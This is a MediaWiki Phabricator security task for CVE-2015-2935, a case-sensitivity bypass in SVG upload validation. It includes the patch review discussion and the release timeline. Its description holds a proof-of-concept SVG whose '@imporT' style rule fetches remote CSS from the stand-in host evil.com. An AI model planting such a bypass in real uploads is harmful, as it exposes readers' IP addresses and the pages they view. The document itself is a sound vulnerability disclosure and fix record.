Page MenuHomePhabricator
Create Task
Maniphest T85349

SVG @import style validation bypass
Closed, ResolvedPublic
Actions

Description

From the iSec assessment, iSEC-WMF1214-3.

They weren't able to get xss as a result, and we don't embed svg's in articles (yet), so it shouldn't be too exploitable, but since the fix is easy, we should get this patched soon.

DESCRIPTION: When uploading an SVG file, it is possible to bypass the validation filters and upload
an SVG file that references a remote CSS. For example, the following style declaration within an SVG
file will cause any browser that renders the file to fetch http://evil.com/attack.css :

<svg xmlns="http://www.w3.org/2000/svg">
<style>@imporT'http://evil.com/attack.css';</style>
</svg>

This vulnerability can be exploited to break the anonymity of MediaWiki's readers. This can be used
by malicious individual or governments, which will be able to identify the reader's location from their
IP and the visited page from the referrer header.

SHORT TERM SOLUTION: Modify the regular expressions for validating SVG file uploads to block the
import keyword in a case-insensitive manner.

LONG TERM SOLUTION: Examine all other validation expressions to ensure that case-sensitivity is han-
dled in a context-appropriate manner.

Patch:

0001-PATCH-SECURITY-Make-SVG-import-checking-case-insensi.patch2 KBDownload

  • 1.24:
    0001-PATCH-SECURITY-Make-SVG-import-checking-case-insensi.patch2 KBDownload
  • 1.23:
    0001-PATCH-SECURITY-Make-SVG-import-checking-case-insensi.patch2 KBDownload
  • 1.19:
    T85349-REL1_19.patch1020 BDownload

Affected Versions: This resulted from an incomplete fix for T71008, which affected all versions of mediawiki that allowed SVG uploads
Type: xss
CVE: CVE-2015-2935

Details

SubjectRepoBranchLines +/-
SECURITY: Make SVG @import checking case insensitivemediawiki/coremaster+7 -1
SECURITY: Make SVG @import checking case insensitivemediawiki/coreREL1_19+1 -1
SECURITY: Make SVG @import checking case insensitivemediawiki/coreREL1_23+7 -1
SECURITY: Make SVG @import checking case insensitivemediawiki/coreREL1_24+7 -1
Customize query in gerrit

Related Objects
Search...

Event Timeline

csteipp created this task.Dec 26 2014, 9:38 PM
csteipp raised the priority of this task from to High.
csteipp updated the task description. (Show Details)
csteipp added a project: acl*security.
csteipp changed Security from None to Software security bug.
csteipp added a subscriber: csteipp.
Restricted Application changed the visibility from "Public (No Login Required)" to "Custom Policy". · View Herald TranscriptDec 26 2014, 9:38 PM
Restricted Application changed the edit policy from "All Users" to "Custom Policy". · View Herald Transcript
Parent5446 claimed this task.Dec 26 2014, 11:42 PM

Figured since it's end of day and it's a quick patch I threw it together. I'm not completely familiar with the upload system, so somebody else who is should check this over to make sure.

0001-SECURITY-Make-SVG-import-checking-case-insensitive.patch2 KBDownload

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptDec 26 2014, 11:42 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
Anomie added subscribers: Parent5446, Anomie.Dec 29 2014, 7:13 PM
In T85349#944617, @Parent5446 wrote:

0001-SECURITY-Make-SVG-import-checking-case-insensitive.patch2 KBDownload

Unit test doesn't fail on the current code (the test SVG is rejected anyway for other reasons).

Other than that, looks good.

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptDec 29 2014, 7:13 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
Parent5446 added a comment.Dec 29 2014, 7:18 PM

Do you know what other reasons there are? Not that familiar with SVG. I figured the previous test case should have been enough.

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptDec 29 2014, 7:18 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
Anomie added a comment.Dec 29 2014, 7:26 PM

The 'url(...)' bit is also disallowed by the check at UploadBase.php line 1595.

Basically we want to see a failed test (meaning the SVG file would have been accepted) if we apply only the unit test part of your patch.

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptDec 29 2014, 7:26 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
Parent5446 added a comment.Dec 30 2014, 8:57 PM

OK, removed the url() part, and tested to make sure the test fails on master.

0001-PATCH-SECURITY-Make-SVG-import-checking-case-insensi.patch2 KBDownload

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptDec 30 2014, 8:57 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
Anomie added a comment.Dec 30 2014, 9:00 PM
In T85349#949507, @Parent5446 wrote:

0001-PATCH-SECURITY-Make-SVG-import-checking-case-insensi.patch2 KBDownload

Looks sane to me.

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptDec 30 2014, 9:00 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
csteipp updated the task description. (Show Details)Jan 5 2015, 8:50 PM
Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptJan 5 2015, 8:50 PM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
csteipp added a comment.Jan 13 2015, 12:52 AM

Sorry for the delay on this. Patch looks good, I'll deploy it tomorrow.

Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptJan 13 2015, 12:52 AM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
csteipp mentioned this in T85850: Stored XSS in SVG via embedded SVG.Jan 13 2015, 1:07 AM
Restricted Application changed the visibility from "Custom Policy" to "Custom Policy". · View Herald TranscriptJan 13 2015, 1:07 AM
Restricted Application changed the edit policy from "Custom Policy" to "Custom Policy". · View Herald Transcript
csteipp added a parent task: T87275: MediaWiki Security release 1.24.2.Jan 20 2015, 11:08 PM
csteipp closed this task as Resolved.Jan 20 2015, 11:13 PM

This is deployed, we'll release with 1.24.2.

csteipp updated the task description. (Show Details)Mar 18 2015, 12:18 AM
csteipp added a project: Vuln-XSS.
csteipp added a comment.Mar 21 2015, 1:29 AM

T85349-REL1_19.patch1020 BDownload

Removed unit tests. In 1.19, XmlTypeCheck only works on files, not strings, so unit testing is more difficult.

csteipp updated the task description. (Show Details)Mar 21 2015, 1:30 AM
csteipp added subscribers: Grunny, ProgramCeltic.Mar 30 2015, 8:02 PM
csteipp changed the visibility from "Custom Policy" to "Custom Policy".Mar 31 2015, 12:37 PM
csteipp changed the visibility from "Custom Policy" to "Public (No Login Required)".Mar 31 2015, 9:15 PM
csteipp changed the edit policy from "Custom Policy" to "All Users".
csteipp changed Security from Software security bug to None.
gerritbot added a subscriber: gerritbot.Mar 31 2015, 9:22 PM

Change 201011 had a related patch set uploaded (by CSteipp):
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201011

gerritbot added a project: Patch-For-Review.Mar 31 2015, 9:22 PM
gerritbot added a comment.Mar 31 2015, 9:29 PM

Change 201023 had a related patch set uploaded (by CSteipp):
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201023

gerritbot added a comment.Mar 31 2015, 9:35 PM

Change 201033 had a related patch set uploaded (by CSteipp):
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201033

gerritbot added a comment.Mar 31 2015, 9:45 PM

Change 201011 merged by jenkins-bot:
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201011

csteipp mentioned this in rMW4bafab78ab31: SECURITY: Make SVG @import checking case insensitive.Mar 31 2015, 9:46 PM
gerritbot added a comment.Mar 31 2015, 10:21 PM

Change 201023 merged by jenkins-bot:
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201023

gerritbot added a comment.Mar 31 2015, 10:22 PM

Change 201033 merged by jenkins-bot:
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201033

csteipp mentioned this in rMWdb06d2351843: SECURITY: Make SVG @import checking case insensitive.Mar 31 2015, 10:22 PM
csteipp mentioned this in rMW7c19043d1dc2: SECURITY: Make SVG @import checking case insensitive.
gerritbot added a comment.Apr 1 2015, 4:57 PM

Change 201217 had a related patch set uploaded (by CSteipp):
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201217

gerritbot added a comment.Apr 1 2015, 5:15 PM

Change 201217 merged by jenkins-bot:
SECURITY: Make SVG @import checking case insensitive

https://gerrit.wikimedia.org/r/201217

csteipp mentioned this in rMWb813539d6d80: SECURITY: Make SVG @import checking case insensitive.Apr 1 2015, 5:15 PM
csteipp updated the task description. (Show Details)Apr 9 2015, 10:50 PM
chasemp added a project: Security.Feb 10 2020, 10:56 PM
chasemp removed a project: acl*security.Feb 20 2020, 8:16 PM
Aklapper removed a subscriber: Anomie.Oct 16 2020, 5:41 PM
Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL